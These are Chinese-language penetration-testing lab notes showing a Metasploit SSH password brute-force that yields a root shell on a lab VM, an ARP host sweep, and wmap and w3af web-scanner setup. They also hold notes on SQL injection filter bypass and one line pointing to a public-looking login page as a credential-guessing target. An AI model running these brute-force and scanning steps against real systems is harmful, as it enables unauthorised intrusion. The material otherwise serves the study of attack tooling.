line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set USERNAME root USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE / root/ passwd ://在root根目录下创建一个密码文件,名字叫passwd
PASS_FILE => root passwd
msf auxiliary(ssh_login) > set THREADS 50 THREADS => 50
msf auxiliary(ssh_login) > set RHOSTS 10.10.10.129 RHOSTS => 10.10.10.129 msf auxiliary(ssh_login) > run
[*] 10.10.10.129:22 SSH - Starting bruteforce
[*] 10.10.10.129:22 SSH - [1/3] - Trying: username: 'root' with password: 'ahbieid' [-] 10.10.10.129:22 SSH - [1/3] - Failed: 'root':'ahbieid'
[*] 10.10.10.129:22 SSH - [2/3] - Trying: username: 'root' with password: 'xideoejd' [-] 10.10.10.129:22 SSH - [2/3] - Failed: 'root':'xideoejd'
[*] 10.10.10.129:22 SSH - [3/3] - Trying: username: 'root' with password: 'owaspbwa'
[*] Command shell session 1 opened (10.10.10.128:40157 -> 10.10.10.129:22) at 2015-03-14 13:51:30 +0800
[+] 10.10.10.129:22 SSH - [3/3] - Success: 'root':'owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 口令猜解成功。
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
主机存活探测实验:
msf > use auxiliary/scanner/discovery/arp_sweep msf auxiliary(arp_sweep) > show options
Module options (auxiliary/scanner/discovery/arp_sweep):
Name Current Setting Required Description ---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target address range or CIDR identifier SHOST no Source IP Address SMAC no Source MAC Address
THREADS 1 yes The number of concurrent threads
TIMEOUT 5 yes The number of seconds to wait for new data
msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24 RHOSTS => 10.10.10.0/24
msf auxiliary(arp_sweep) > set THREADS 50 THREADS => 50
msf auxiliary(arp_sweep) > run
[*] 10.10.10.1 appears to be up (VMware, Inc.). [*] 10.10.10.2 appears to be up (VMware, Inc.). [*] 10.10.10.129 appears to be up (VMware, Inc.). [*] 10.10.10.130 appears to be up (VMware, Inc.). [*] 10.10.10.254 appears to be up (VMware, Inc.). [*] 10.10.10.254 appears to be up (VMware, Inc.). [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
网络扫描 Openvas 等
Web扫描
1、modules/auxiliary下,wmap load wmap(初始化wmap)
wmap_sites -a http://XXX (使用wmap进行扫描 wmap_sites -l
wmap_targets -t http://XXXX
wamp_run -t (运行后,wmap会调用配置好的辅助模块对目标进行扫描,然后查看结果) wamp_run -e vunls ??
www.exploit-db.com
www.netasploit.com/modules packetstormsecurity.org
cd /usr/share/w3af/
关于扫描的一个很实用的工具W3af w3af_console
plugins
audit xss(表示跨站漏洞) sql(表示注入)漏洞 back plugins
output html_file, console output config html_file
set output_file 123.html set verbose True back back plugins
crawl web_spider
crawl config web_spider set only_forward True set follow_regex .* set ignore_regex back back target
set target http://www.dvssc.com/mutillidae/ back
SQL注入关键字: 参数化查询 过滤(白名单)
编码(绕过防注,过滤) Mysql款字节
二次输入(任何输入都是有害的) 容错处理(暴错输入)
最小权限(目前,非常多root,见乌云)
http://218.206.165.70:8972/qhwxcs-djy/login.jsp 找到用户名和密码就可以登录进去
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 扫描实验:
root@kali:~# cd /usr/share/w3af/
root@kali:/usr/share/w3af# w3af_console w3af>>> plugins
w3af/plugins>>> help
|------------------------------------------------------------------------------------|
| list | List available plugins. | |------------------------------------------------------------------------------------|
| back | Go to the previous menu. | | exit | Exit w3af. |
|------------------------------------------------------------------------------------|
| bruteforce | View, configure and enable bruteforce plugins | | infrastructure | View, configure and enable infrastructure plugins |
| evasion | View, configure and enable evasion plugins | | mangle | View, configure and enable mangle plugins | | audit | View, configure and enable audit plugins | | grep | View, configure and enable grep plugins | | output | View, configure and enable output plugins | | auth | View, configure and enable auth plugins | | crawl | View, configure and enable crawl plugins | |------------------------------------------------------------------------------------| w3af/plugins>>> audit
-----------------------------------------------------------------------------------|
| Plugin name | Status | Conf | Description | |-----------------------------------------------------------------------------------|
| blind_sqli | | Yes | Identify blind SQL injection |
| | | | vulnerabilities. |
| buffer_overflow | | | Find buffer overflow vulnerabilities. | | cors_origin | | Yes | Inspect if application checks that the value |
| | | | of the \ | | | | | with the value of the remote IP address/Host | | | | | of the sender ofthe incoming HTTP request. | | csrf | | | Identify Cross-Site Request Forgery |
| | | | vulnerabilities. |
| dav | | | Verify if the WebDAV module is properly |
| | | | configured. |
| eval | | Yes | Find insecure eval() usage. | | file_upload | | Yes | Uploads a file and then searches for the | | | | | file inside all known directories. | | format_string | | | Find format string vulnerabilities. | | frontpage | | | Tries to upload a file using frontpage |
| | | | extensions (author.dll). | | generic | | Yes | Find all kind of bugs without using a fixed |